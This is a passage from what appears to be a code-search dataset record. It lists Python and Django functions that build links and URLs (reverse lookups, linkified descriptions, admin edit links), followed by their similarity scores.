http://localhost:8080/\n \"\"\"\n layout = view.queryLayout(request, context)\n return layout(vform.render())\n\n raise HTTPFound(location=context.href)", "def to_projectlink(self):\n\n thumb_image_url = reverse('project_serve_file', args=[self.short_name,self.logo])\n\n args = {\"abreviation\":self.short_name,\n \"title\":self.short_name,\n \"description\":self.description,\n \"URL\":reverse('comicsite.views.site', args=[self.short_name]),\n \"download URL\":\"\",\n \"submission URL\":self.get_submission_URL(),\n \"event name\":self.event_name,\n \"year\":\"\",\n \"event URL\":self.event_url,\n \"image URL\":self.logo,\n \"thumb_image_url\":thumb_image_url,\n \"website section\":\"active challenges\",\n \"overview article url\":self.publication_url,\n \"overview article journal\":self.publication_journal_name,\n \"overview article citations\":\"\",\n \"overview article date\":\"\",\n \"submission deadline\":\"\",\n \"workshop date\":self.workshop_date,\n \"open for submission\":\"yes\" if self.is_open_for_submissions else \"no\",\n \"data download\":\"yes\" if self.offers_data_download else \"no\",\n \"dataset downloads\":self.number_of_downloads,\n \"registered teams\":\"\",\n \"submitted results\":self.number_of_submissions,\n \"last submission date\":self.last_submission_date,\n \"hosted on comic\":True,\n \"created at\":self.created_at\n }\n\n projectlink = ProjectLink(args)\n return projectlink", "def linkified_description(self):\n links = []\n def linkify(matchobj, links=links):\n if '|' in matchobj.group(1):\n url = matchobj.group(1).split('|')\n link = format_html('<a href=\"{0}\" target=\"_blank\">{1}</a>', url[0], url[1])\n else:\n link = format_html('<a href=\"{0}\" target=\"_blank\">{1}</a>', self.url, matchobj.group(1))\n links.append(link)\n return '{%d}' % (len(links) - 1)\n\n fmt = re.sub(r'\\[\\[([^\\]]+)\\]\\]', linkify, self.description)\n return format_html(fmt, *links)", "def link(self, link):\r\n return links.Link(self, link)", "def cal_link(self):\n return get_host() + reverse('events:detail', args=[self.id])", "def user2Link(user): \n # could also look up mail addrs via a table lookup, etc\n return '<a href=\"mailto:%(user)s@somewebsite.com\">%(user)s</a>' % {\"user\": user}", "def undo_format_link_segment(value):\n\n if json_api_settings.FORMAT_RELATED_LINKS:\n return format_value(value, \"underscore\")\n\n return value", "def format_value(obj, field_name):\n display_func = getattr(obj, 'get_%s_display' % field_name, None)\n if display_func:\n return display_func()\n value = getattr(obj, field_name)\n\n if isinstance(value, models.fields.files.FieldFile):\n if value:\n return mark_safe('<a href=\"%s\">%s</a>' % (\n value.url,\n os.path.basename(value.name),\n ))\n else:\n return ''\n\n if isinstance(value, models.Model):\n return format_value_instance(value)\n\n if isinstance(value, models.Manager):\n return mark_safe(', '.join(\n [format_value_instance(instance) for instance in value.all()]\n ))\n if value is None:\n value = \"\"\n return value", "def edit_link(instance):\n\n try:\n content_type = ContentType.objects.get_for_model(instance.__class__)\n except AttributeError:\n raise ValueError('Passed value must be registered model instance')\n else:\n model_admin_change_link = 'admin:{app}_{model}_change'.format(\n app=content_type.app_label,\n model=content_type.model\n )\n return reverse(model_admin_change_link, args=(instance.id,))", "def get_absolute_url(self):\n\t\treturn reverse('source-detail', args=[str(self.id)])", "def _render_link(self, context, name, label, extra=''):\n product = Product.select(self.env, where={'name' : name})\n if product:\n product = product[0]\n href = context.href.products(product.prefix)\n if 'PRODUCT_VIEW' in context.perm(product.resource):\n return tag.a(label, class_='product', href=href + extra)\n elif 'PRODUCT_CREATE' in context.perm('product', name):\n return tag.a(label, class_='missing product', \n href=context.href('products', action='new'),\n rel='nofollow')\n return tag.a(label, class_='missing product')", "def _format_obj(cls, **kwargs):\n def doc_rebuilder(obj):\n if kwargs.pop('_VOID_',False):\n return ''\n try:\n doc = getattr(obj,'__doc__')\n assert doc\n except:\n return ''\n else:\n return doc.format(**kwargs) # str(doc).format(**kwargs)\n return doc_rebuilder", "def render(self, context):\n try:\n # Retrieve the object instance.\n obj = Variable(self.obj).resolve(context)\n except VariableDoesNotExist:\n obj = self.obj\n \n try:\n urlname = 'admin:%s_%s_change' % (\n obj._meta.app_label, obj._meta.module_name\n )\n url = reverse(urlname, args=(obj.pk,))\n except NoReverseMatch, err:\n if settings.TEMPLATE_DEBUG:\n print \"Got an exception resolving an admin url: \", err\n return ''\n \n if self.varname:\n context[self.varname] = url\n else:\n return url", "def get_absolute_url(self):\n return reverse('model-detail-view', args=[str(self.id)])" ]
[ "0.73224676", "0.7216829", "0.7124374", "0.68019325", "0.65847546", "0.64726907", "0.64016116", "0.63936055", "0.6361755", "0.635381", "0.63412184", "0.63111347", "0.6248648", "0.6244252", "0.61723745", "0.61185104", "0.6079688", "0.6079688", "0.60349536", "0.6026926", "0.6017183", "0.6002368", "0.59222513", "0.5901884", "0.5883708", "0.5872645", "0.58527756", "0.5842337", "0.58284605", "0.58029336", "0.58029217", "0.5792112", "0.5787524", "0.5786158", "0.577088", "0.57589257", "0.57504374", "0.5735008", "0.57175756", "0.57063144", "0.5688553", "0.56777245", "0.56621176", "0.5660761", "0.56483155", "0.56337404", "0.56256706", "0.5608898", "0.5590851", "0.558507", "0.557859", "0.55728716", "0.5563868", "0.55496395", "0.55481774", "0.5540833", "0.5526031", "0.5523063", "0.55175793", "0.5502691", "0.5502625", "0.5496755", "0.5495098", "0.54707795", "0.54370236", "0.5428369", "0.54063267", "0.54008967", "0.54008967", "0.5388686", "0.5378782", "0.53771055", "0.5367568", "0.53553843", "0.5355195", "0.53477806", "0.5329413", "0.53293824", "0.5326268", "0.5313031", "0.5310645", "0.5294537", "0.5293742", "0.52923715", "0.5288311", "0.52865934", "0.5285031", "0.52790004", "0.5276834", "0.5275771", "0.5274485", "0.526663", "0.5265255", "0.524917", "0.5248437", "0.5247382", "0.52417517", "0.52333325", "0.5229363", "0.52293473" ]
0.75110674
0